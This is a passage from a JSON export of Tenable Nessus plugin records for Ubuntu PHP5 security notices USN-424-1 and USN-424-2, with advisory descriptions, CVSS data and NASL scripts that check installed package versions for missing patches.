php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:22", "bulletinFamily": "scanner", "description": "USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes were not included, which caused errors in the stream filters. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nMultiple buffer overflows have been discovered in various PHP modules.\nIf a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter.\n(CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible.\nDepending on the PHP application this could lead to disclosure of potentially sensitive information.\n(CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script.\n(CVE-2007-0988).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-424-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=28017", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.10 / 6.06 LTS / 6.10 : php5 regression (USN-424-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-424-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28017);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_bugtraq_id(22496);\n script_xref(name:\"USN\", value:\"424-2\");\n\n script_name(english:\"Ubuntu 5.10 / 6.06 LTS / 6.10 : php5 regression (USN-424-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes\nwere not included, which caused errors in the stream filters. This\nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nMultiple buffer overflows have been discovered in various PHP modules.\nIf a PHP application processes untrusted data with functions of the\nsession or zip module, or various string functions, a remote attacker\ncould exploit this to execute arbitrary code with the privileges of\nthe web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that\ncould be exploited to crash the PHP interpreter.\n(CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for\nsome buffer boundaries and had an uninitialized variable. By\nunserializing untrusted data, this could be exploited to\nexpose memory regions that were not meant to be accessible.\nDepending on the PHP application this could lead to\ndisclosure of potentially sensitive information.\n(CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various\nprint functions and the odbc_result_all() were susceptible\nto a format string vulnerability. A remote attacker could\nexploit this to execute arbitrary code with the privileges\nof the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite\nsuperglobal variables (like the HTTP GET/POST arrays) with\ncrafted session data. (CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the\nzend_hash_init() function could be forced to enter an\ninfinite loop, consuming CPU resources, for a limited length\nof time, until the script timeout alarm aborts the script.\n(CVE-2007-0988).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/424-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.10|6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.10 / 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php-pear\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cgi\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cli\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-common\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-curl\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-dev\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-gd\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-ldap\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mhash\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mysql\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-odbc\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-pgsql\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-recode\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-snmp\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sqlite\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sybase\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xsl\", pkgver:\"5.0.5-2ubuntu1.8\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php-pear\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-cgi\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-cli\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-common\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-curl\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-dev\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-gd\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-ldap\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mhash\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mysql\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mysqli\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-odbc\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-pgsql\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-recode\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-snmp\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-sqlite\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-sybase\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-xsl\", pkgver:\"5.1.6-1ubuntu2.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php-pear / php5 / php5-cgi / php5-cli / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:22", "bulletinFamily": "scanner", "description": "Multiple buffer overflows have been discovered in various PHP modules.\nIf a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information.\n(CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data.\n(CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-424-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=28016", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.10 / 6.06 LTS / 6.10 : php5 vulnerabilities (USN-424-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-424-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28016);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_bugtraq_id(22496);\n script_xref(name:\"USN\", value:\"424-1\");\n\n script_name(english:\"Ubuntu 5.10 / 6.06 LTS / 6.10 : php5 vulnerabilities (USN-424-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple buffer overflows have been discovered in various PHP modules.\nIf a PHP application processes untrusted data with functions of the\nsession or zip module, or various string functions, a remote attacker\ncould exploit this to execute arbitrary code with the privileges of\nthe web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that could be\nexploited to crash the PHP interpreter. (CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for some\nbuffer boundaries and had an uninitialized variable. By unserializing\nuntrusted data, this could be exploited to expose memory regions that\nwere not meant to be accessible. Depending on the PHP application this\ncould lead to disclosure of potentially sensitive information.\n(CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various print\nfunctions and the odbc_result_all() were susceptible to a format\nstring vulnerability. A remote attacker could exploit this to execute\narbitrary code with the privileges of the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite superglobal\nvariables (like the HTTP GET/POST arrays) with crafted session data.\n(CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the\nzend_hash_init() function could be forced to enter an infinite loop,\nconsuming CPU resources, for a limited length of time, until the\nscript timeout alarm aborts the script. (CVE-2007-0988).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/424-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.10|6\\.06|6\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.10 / 6.06 / 6.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php-pear\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cgi\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cli\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-common\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-curl\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-dev\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-gd\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-ldap\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mhash\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mysql\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-odbc\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-pgsql\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-recode\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-snmp\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sqlite\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sybase\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xsl\", pkgver:\"5.0.5-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif 